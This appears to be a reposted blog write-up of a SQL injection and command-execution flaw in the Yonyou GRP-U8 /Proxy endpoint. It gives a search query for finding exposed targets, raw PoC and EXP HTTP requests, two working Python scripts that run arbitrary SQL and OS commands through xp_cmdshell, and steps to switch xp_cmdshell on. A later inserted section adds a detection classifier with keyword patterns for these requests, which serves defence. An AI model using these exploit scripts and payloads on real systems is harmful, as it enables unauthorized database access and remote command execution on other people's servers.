UF GRP-U8 SQL injection & command execution

FOFA search query: title="GRP-U8"

1. Query the version: select @@version
2. Check whether the connection has sa privileges: select IS_SRVROLEMEMBER('sysadmin') // returns 1 when the login is a sysadmin, so arbitrary SQL statements can be executed
3. Check whether the target's MSSQL instance has the xp_cmdshell extended stored procedure: select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' // any non-zero result means the xp_cmdshell extended stored procedure exists

  1. PoC
POST /Proxy HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>


#!/usr/bin/env python2
#coding:utf-8
# PoC: send one AS_DataRequest packet to /Proxy and print the first column of the first result row.
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

if len(sys.argv) != 3:
    print "Usage: python poc.py url sql"
    sys.exit(1)
url = sys.argv[1]
sql = sys.argv[2]
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
}

def poc(url, sql):
    url = url + '/Proxy'
    print url
    # The SQL is placed unmodified into the Data parameter of the R9PACKET XML.
    data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">' + sql + '</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
    res = requests.post(url, headers=headers, data=data)
    res = res.text
    # Result rows come back as <ROW COLUMN1="..."> elements.
    result_row = r'<ROW COLUMN1="(.*?)"'
    ROW = re.findall(result_row, res, re.S | re.M)
    if not ROW:
        print 'No result rows found in the response.'
        return
    print '查询成功!'
    print ROW[0]

if __name__ == "__main__":
    poc(url, sql)


  1. EXP
POST /Proxy HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'dir'</DATA> </PARAM></PARAMS></R9FUNCTION></R9PACKET>
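The PoC and EXP requests above share one packet shape: a form field dp carrying R9PACKET XML whose AS_DataRequest / DataSetProviderData "Data" parameter is handed to the database as SQL. The following is an added detection example, not code from the original post or from the vendor: it parses captured POST bodies to /Proxy, pulls out that Data parameter and labels it by what the statement is trying to do. The sample bodies, the label names and the keyword lists are constructed here, modelled on the queries shown on this page.

```python
#!/usr/bin/env python3
"""Classify captured POST bodies sent to the GRP-U8 /Proxy endpoint.

Added detection example (not from the original post). The R9PACKET layout
follows the requests shown on the page; the sample bodies below are constructed.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Keyword groups, checked most severe first. Matching is done on lower-cased SQL.
CONFIG_PATTERNS = (r"\bsp_configure\b", r"\breconfigure\b")
CMDEXEC_PATTERNS = (r"\bxp_cmdshell\b",)
RECON_PATTERNS = (r"@@version", r"\bis_srvrolemember\b", r"\bsysobjects\b",
                  r"\bhost_name\(\)", r"\bdb_name\(\)")


def extract_data_param(body):
    """Return the SQL carried in the Data parameter of an AS_DataRequest packet, or None.

    The body is application/x-www-form-urlencoded with the XML in the `dp` field.
    parse_qs percent-decodes it; the page's captures show it unencoded, which also
    parses as long as the SQL itself contains no '&'.
    """
    dp = parse_qs(body, keep_blank_values=True).get("dp", [""])[0]
    if not dp:
        return None
    try:
        # str input: expat parses it as UTF-8 and ignores the GB2312 declaration
        root = ET.fromstring(dp)
    except ET.ParseError:
        return None
    if root.tag != "R9PACKET":
        return None
    for func in root.iter("R9FUNCTION"):
        if (func.findtext("NAME") or "").strip() != "AS_DataRequest":
            continue
        params = {}
        for param in func.iter("PARAM"):
            name = (param.findtext("NAME") or "").strip()
            params[name] = param.findtext("DATA") or ""
        if params.get("ProviderName", "").strip() == "DataSetProviderData":
            return params.get("Data")
    return None


def classify(body):
    """Label one body: benign, sql-passthrough, recon, config-change or command-execution."""
    sql = extract_data_param(body)
    if sql is None:
        return "benign"
    lowered = sql.lower()
    if any(re.search(p, lowered) for p in CONFIG_PATTERNS):
        return "config-change"
    if any(re.search(p, lowered) for p in CMDEXEC_PATTERNS):
        return "command-execution"
    if any(re.search(p, lowered) for p in RECON_PATTERNS):
        return "recon"
    # Anything else reaching DataSetProviderData is still client-supplied SQL.
    return "sql-passthrough"


def summarize(bodies):
    """Count labels across a batch of captured bodies (e.g. from a proxy or WAF log)."""
    counts = {}
    for body in bodies:
        label = classify(body)
        counts[label] = counts.get(label, 0) + 1
    return counts


def _packet(sql):
    # Build a constructed sample body in the layout shown in the post.
    return ('cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>'
            '<R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION>'
            '<NAME>AS_DataRequest</NAME><PARAMS>'
            '<PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM>'
            '<PARAM><NAME>Data</NAME><DATA format="text">' + sql + '</DATA></PARAM>'
            '</PARAMS></R9FUNCTION></R9PACKET>')


# Constructed samples: the first three mirror the statements on the page,
# the last is a packet that carries no AS_DataRequest function at all.
SAMPLE_RECON = _packet("select user,db_name(),host_name(),@@version")
SAMPLE_CMD = _packet("exec xp_cmdshell 'dir'")
SAMPLE_CONFIG = _packet("EXEC sp_configure 'xp_cmdshell', 1")
SAMPLE_OTHER = ('cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>'
                '<R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT></R9PACKET>')

if __name__ == "__main__":
    for name, body in (("recon", SAMPLE_RECON), ("cmd", SAMPLE_CMD),
                       ("config", SAMPLE_CONFIG), ("other", SAMPLE_OTHER)):
        print(name, "->", classify(body))
    print(summarize([SAMPLE_RECON, SAMPLE_CMD, SAMPLE_CONFIG, SAMPLE_OTHER]))
```

Feed it bodies from a reverse proxy or WAF log. Any body that lands on sql-passthrough or a more severe label shows client-supplied SQL reaching the server, which is the underlying flaw regardless of what the particular statement does, so the request-level rule is "block or alert on AS_DataRequest with a DataSetProviderData Data parameter", not a keyword list. On the database side, switching xp_cmdshell on through sp_configure also writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" line to the SQL Server error log, which gives a second, host-level detection point.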


#!/usr/bin/env python2
#coding:utf-8
# EXP: wrap one OS command in exec xp_cmdshell, send it to /Proxy and print each output line.
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

if len(sys.argv) != 3:
    print "Usage: python exp.py url cmd"
    sys.exit(1)
url = sys.argv[1]
cmd = sys.argv[2]
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
}

def exp(url, cmd):
    url = url + '/Proxy'
    print url
    # The command is placed inside exec xp_cmdshell '...' in the Data parameter of the R9PACKET XML.
    data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell \'' + cmd + '\'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
    res = requests.post(url, headers=headers, data=data)
    res = res.text
    # Each output line of xp_cmdshell comes back as a <ROW output="..." /> element.
    result_row = r'<ROW output="(.*?)" />'
    ROW = re.findall(result_row, res, re.S | re.M)
    if not ROW:
        print 'No output rows found in the response.'
        return
    print '命令执行成功!'
    for line in ROW:
        print line

if __name__ == "__main__":
    exp(url, cmd)


A pitfall here:
!!! If an error is reported, run the following statements one at a time, and only then run the system command. !!!
Enabling xp_cmdshell:
USE master
RECONFIGURE  -- refresh first, so any pending configuration change is applied
EXEC sp_configure 'show advanced options', 1  -- enable advanced options so that xp_cmdshell can be configured
RECONFIGURE  -- refresh the configuration
EXEC sp_configure 'xp_cmdshell', 1  -- enable xp_cmdshell so that OS commands can be called from within SQL Server
RECONFIGURE  -- refresh the configuration

Source: blog.csdn.net/weixin_44146996/article/details/109863346